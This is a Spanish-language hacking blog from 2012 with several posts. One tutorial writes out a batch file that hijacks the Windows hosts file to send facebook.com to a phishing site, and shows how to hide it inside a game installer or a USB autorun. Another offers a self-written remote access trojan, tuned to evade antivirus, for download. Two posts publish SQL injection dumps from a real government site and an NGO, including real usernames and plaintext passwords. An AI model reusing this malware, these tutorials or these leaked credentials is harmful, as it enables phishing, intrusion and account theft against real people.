HD_Breaker Seguridad Informatica

Ethical Hacking And Exploits Development

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Wargames Challenges and Solutions

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Python App Development

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Java Development Tools

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Android App Development

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

martes, 4 de septiembre de 2012

BlackBuntu & Backtrack!

Hoy me encontre con un problema muy grande entre mi notebook y mi Backtrack 5 R3.

Este Ultimo Entraba en Conflictos con mi placa de video Intel HD, por lo q cada Tanto Crasheaba Gnome y me cerraba todo Proyecto q no habia guardado, ante este inconveniente decidi volver a mi viejo pero muy confliable Blackbuntu ce 0.3, este aunq con menos Herramientas que Backtrack es un muy confiable y potente Distribucion de Pentest.

Una vez dentro de el, me encontre con la incopatibilidad entre mi placa wifi Broadcom BCM4313 y Blackbuntu y un problema de drivers entre mi touchpad vertical scroll, despues de horas de intentos fallidos encontre una solucion que me parecio muy importante compartir para resolver este fallo, la clave esta en Actualizar el Kernel a la version 3.4 o superior, para lograr esto seguir los siguientes pasos:



1) Ir hacia la zona de Descarga: http://kernel.ubuntu.com/~kernel-ppa/mainline/
2) Entrar en la Carpeta del Kernel deseado en mi caso 3.4.0 (precise)
3) Descargar los siguientes paketes:
                                                        linux-headers___all.deb
                                                        linux-headers___amd64.deb
                                                        linux-image___amd64.deb
4) Instalar los paquetes en el mismo Orden de Descarga del Punto 3.
5) Actualizar Grub2: En un terminal colocar sudo update-grub
6) Reiniciar.

Luego de esto me digne a reiniciar mi pc al iniciar sorpresivamente para mi el Wifi empeso a funcionar a la Perfeccion y ya no tenia problemas con el scroll, ahora sin Problemas en Gnome, sin Problemas con el Wifi y sin Problemas con el TouchPad me voy directo a Solucionar el Problema de las Herramientas Agregando a Blackbuntu los Repositorios Oficiales de Backtrack.

Abrimos el terminal: sudo gedit /etc/apt/sources.list
Copiamos al final de todo:

#####BACKTRACK 5R3 REPOSITORIOS######
deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://32.repository.backtrack-linux.org revolution main microverse non-free testing
deb http://source.repository.backtrack-linux.org revolution main microverse non-free testing

Guardamos y Cerramos.

En el Terminal Colocamos:

sudo wget -q http://all.repository.backtrack-linux.org/backtrack.gpg -O- | sudo apt-key add -

Luego:

sudo add-apt-repository ppa:tualatrix/ppa
sudo apt-get update

Despues de Esto Solo queda Abrir Synaptic y instalar las herramientas que deseamos y no posea nuestro Blackbuntu.

jueves, 23 de agosto de 2012

Segundo Crackme Java Keygening

http://www.filefactory.com/file/11qg8hrti5jj/n/CrackMe2.jar

Pequeño Crackme donde tenemos q generar un serial a base de un "Usuario"

martes, 21 de agosto de 2012

Crackme Java

Bastante Facil espero q sea del agrado de los Lectores:

http://www.filefactory.com/file/1dwtw3qemo55/n/CrackMe.jar

martes, 7 de agosto de 2012

Dns Spoof Modificando Archivo hosts con "Malware"


DNS Spoofing Malware


Bueno en este Tutorial Vamos a ver como realizar un DnsSpoof
atraves del Malware, Modificando el archivo Hosts, y redireccionando
una web a la ip que nosotros deseemos, veremos tambien como ejecutar
este malware desde un una Memoria Flash

El ataque DnsSpoof en el q nos basaremos sera el que modifica el archivo hosts
para eso crearemos un Malware q constara de 2 archivos en un caso y 4 en otro


Primer Caso:

Ingenieria Social.

Crearemos un malware q constara de 2 archivos
un batch q tendra el siguiente codigo (se guardara con la extencion .bat)


@echo off
echo "IP a la q sera redireccionado" "Sitio que redireccionaremos" >> %SystemRoot%\System32\drivers\etc\hosts
taskkill /f /IM explorer.exe
explorer.exe
exit


En mi caso direccionare facebook.com a un sitio Fake (Phishing)

DNSSPOOF.bat:

echo 190.169.22.51 facebook.com >> %SystemRoot%\system32\drivers\etc\hosts
taskkill /f /IM explorer.exe
explorer.exe
exit

Ahora Uniremos este Archivo con por Ejempo un juego portable de bajo peso,
yo elegi Packman.



Para realizar este proceso utilizaremos iexpress:
(No explicare como Funciona ahi mucha Info en Internet)

Agregamos los 2 Archivos:



aca la parte importante.


Install Program: Pondremos Packman.exe

Post Intall Command: Pondremos DNSSPOOF.bat



En Show Windows ponemos Hidden

En Packege Name and Options marcamos la Opcion Hide file Extracting Progress Animation from User

y lo Guardamos con el Nombre Packman2.exe

En Configure Restart ponemos NO RESTART

Esperamos q Termine la Comprecion

Cambiamos el Icono con ResHacker al q creamos combeniente (en este ejemplo no cambiare el icono)



Ahora ejecutamos para la prueba:



vemos que el juego se ejecuta correctamente, vamos al archivo hosts para ver si funciono.



borramos esta ultima linea porq obviamente nosotros no queremos ser las victimas :)

Ahora no queda mas q usar algo de Ingenieria Social para q la victima Descarge el Archivo y lo ejecute.

Segundo caso:

Ejecutando Archivo desde un PenDrive:

crearemos un archivo autorun.inf que contenga:

[autorun] 

action=Open Files On Folder
icon=USB.ico

shellexecute=Start.vbs

y un Start.vbs que contenga:

set objshell = createobject("wscript.shell")
objshell.run "DNSSPOOF.bat",vbhide

Colocamos DNSSPOOF.bat, Start.vbs, algun .ico q nos guste y el autorun.inf en el PenDrive



Listo Ahora al Conectar el PenDrive Automaticamente se Ejecutara Start.vbs, q a su ves Ejectura DNSSPOOF.bat y cambiara el archivo hosts

Veamos como funciona:

Visitamos facebook.com luego de ejecutar el Malware en la PC Victima (ya sea por cualquiera de los 2 Casos)
y vemos q nos manda a www.facebook.com (que realmente es un sitio Phishing)
Agregamos de Informacion User: pepe@hotmail.com pass: Owned



y le damos Entrar, nos redirecciona a www.facebook.com (sitio real de facebook)

vamos a nuestro servidor y revisamos el archivo log.txt



Espero Que Este Tutorial les sea de Ayuda, no me hago responsable por el uso que le puedan dar HD_Breaker

viernes, 27 de julio de 2012

BasicRat by HD_Breaker

Les Traigo una Herramienta Que Arme en estos Dias,
Es un Rat bien Basico, en VB6 no es multithread (no he tenido tiempo de modificarlo),
tampoco tiene incluido el Builder exe,
La Shell no responde a cd ni a comandos q requieran respuesta (luego del comando debera pasarse el comando 1 para obtener la respuesta)
El filemanager no esta incluido, preferi hacerlo funcionar con un servidor tftp (tftp -i "ip/host" GET "Archivo") para luego ejecutarlo desde la shell
(en esta parte se pueden armar varios scripts para obtener informacion sensible guardarla en un log y por medio de tftp PUT obtener el Contenido de estos)
No se Adhiere al Registro (esta funcion la pondre en unos dias cuando termine de Rendir, igual cualquiera de esta seccion sabra agregarle funciones a este proyecto)

El Fin de este RAT era mantener la simpleza para reducir la cantidad de AVs que detectan el Server
Todo Nacio a base de Un Proyecto para la Universidad, a esto le falta mucho desarrollo
pero la meta era realizar algo simple y poderoso con baja deteccion y en lenguaje VB6


Prometo Mejorarlo y Codearlo en Otro Lenguaje.

Adjunto Los Proyectos (Source y Binario)

http://www.filefactory.com/file/5rlj3lf28b63/n/BasicRat.rar

Test.exe esta sobre 127.0.0.1 para prueba local,
Para Hacerlo Funcional fuera del entorno local, cambien el ip por su NO-IP y abran los puertos 9669, 6666 y 9999
C:\Windows\System32 puede variar depende de la pc
pueden usar las variables de entorno para setear eso al momento de escribir los logs. (%SystemDrive%\System32\)

Todo Aquel que desee Modificarlo sientace libre de hacerlo.

Capturas:


Un escaneo Rapido Bajo NoVirusThank

File Info

Report date: 2012-07-27 09:57:10 (GMT 1)
File name: test-exe
File size: 28672 bytes
MD5 Hash: aa55baf750fef5167f0bb79cdc1000c0
SHA1 Hash: b8a248d1105ef47e1edd4872ace31b08da2973f0
Detection rate: 1 on 14 (7%)
Status: INFECTED


Detections

Asquared -
Avast -
AVG -
Avira -
BitDefender - Gen:Trojan.Heur.bm0@fr!oGDJ
ClamAV -
Comodo -
DrWeb -
Fprot -
IkarusT3 -
Panda -
STOPZilla -
TrendMicro -
VBA32 -

Scan Date: 2012-07-27
File Name: Test.exe
File Size: 36864 bytes
MD5 Hash: aa55baf750fef5167f0bb79cdc1000c0
SHA1 Hash: b8a248d1105ef47e1edd4872ace31b08da2973f0
Status: INFECTED
Total Result: 7/37
AVG: Clean
Acavir: Clean
Avast 5: Clean
Avast: Clean
Avira: TR/Dropper.Gen
BitDefender: Clean
VirusBuster Internet Security: Clean
Clam Antivirus: Clean
COMODO Internet Security: Clean
DrWeb: Clean
eTrust-Vet: Win32/VBNA.A!generic
F-PROT Antivirus: Clean
F-Secure Internet Security: Trojan.Generic.KDV.554434
G Data: Trojan.Generic.KDV.554434
IKARUS Security: Clean
Kaspersky Antivirus: Trojan-PSW.Win32.Ruftar.nwc
McAfee: Clean
MS Security Essentials: Clean
ESET NOD32: Clean
Norman: Clean
Norton: Clean
Panda Security: Clean
A-Squared Security: Clean
Quick Heal Antivirus: Clean
Rising Antivirus: Clean
Solo Antivirus: Clean
Sophos: Clean
Trend Micro Internet Security: Clean
VBA32 Antivirus: Clean
Vexira Antivirus: Clean
Webroot Internet Security: Clean
Zoner AntiVirus: Clean
Ad-Aware: Clean
AhnLab V3 Internet Security: Clean
Bullguard: virus: Trojan.Generic.KDV.554434
Imunitet: Trojan.Generic.KDV.554434
Vipre: Clean

jueves, 19 de julio de 2012

Blind SQLI en el Gobierno de Salta, Republica Argentina


SQLI en el Gobierno de Salta, Republica Argentina

http://www.salta.gov.ar/video-salta.php?IdVideo=15


[*] information_schema
[*] salta


| tageestado            
| tagefuncionarios      
| tagenda                
| tbanbanners            
| tcoberturaprensa      
| tconcontenidos        
| tencdetalles          
| tencpreguntas          
| tencrespuestas        
| tgaleriafotos          
| tgaleriafotosdet      
| tgaleriavideos        
| tnotcategorias        
| tnotnoticias          
| tnotpartesprensafiles  
| tnotrelacionadas      
| tnotsubcategoria      
| tnottipoparteprensa    
| tseguserlevelpermissions
| tseguserlevels        
| tsegusuarios          
| tsisimportar          
| ttvvivo                



 sUsuarioNick       sUsuarioNombre             sUsuarioPass

 luciam                  Lucia Mallozzi                Prensa13    
 emilces                 Emilce Simo                    paginaweb13  
 maudiovisuales    Medios Audiovisuales     JB@rbatt!4  
 jbarbatti               Jorge Barbatti                   barbattiprensa
 rtorres                  Prensa - Torres                 Rto556      
 aguaymas            Prensa - Guaymas            aGUA123      
 antoniotita           Antonio Tita                     Ant0-/*      
 asapia                  Prensa - Ana Sapia          sap-20!!    

SQLI en Sociedad Animalista


SQLI en http://www.liberaong.org/cat=1
Sociedad Animalista, Estoy a favor de la Proteccion animal, pero
un sitio de esta naturaleza activista no puede tener este tipo de fallas. Ya Reporte el fallo, espero lo Arreglen

[*] information_schema
[*] liberadba
[*] test


| activistas              
| actualidad          
| admin_accesos    
| admin_actualizaciones
| admin_archivos        
| admin_gruposdecampos  
| admin_imagenes        
| admin_log_sql          
| admin_registrosespeciales
| admin_renombra        
| admin_tablas_config  
| admin_usuarios      
| admin_usuarios_grupos
| admin_usuarios_permisos
| banners                
| campanas            
| campanas_relacionadas
| colores                
| conceptos            
| cyberactivistas      
| denuncias              
| estado_denuncia      
| estado_pedido          
| explotacion          
| fotos                  
| fotos_categoria      
| linea_pedido          
| mail                  
| material              
| material_categoria    
| newsletter            
| newsletter_parrafos  
| notas_relacionadas    
| parrafos              
| pedidos                
| receptores              
| recetas                
| registrados            
| registradosgrupo        
| socios                  
| textos                  
| tienda                  
| tienda_categoria        
| videos                  
| videos_categoria        
| voluntarios            


 Username            Password            Tipo_de_usuario
 admin                  fuey3g                 administrador total      
 leo                       leo333                 administrador de contenidos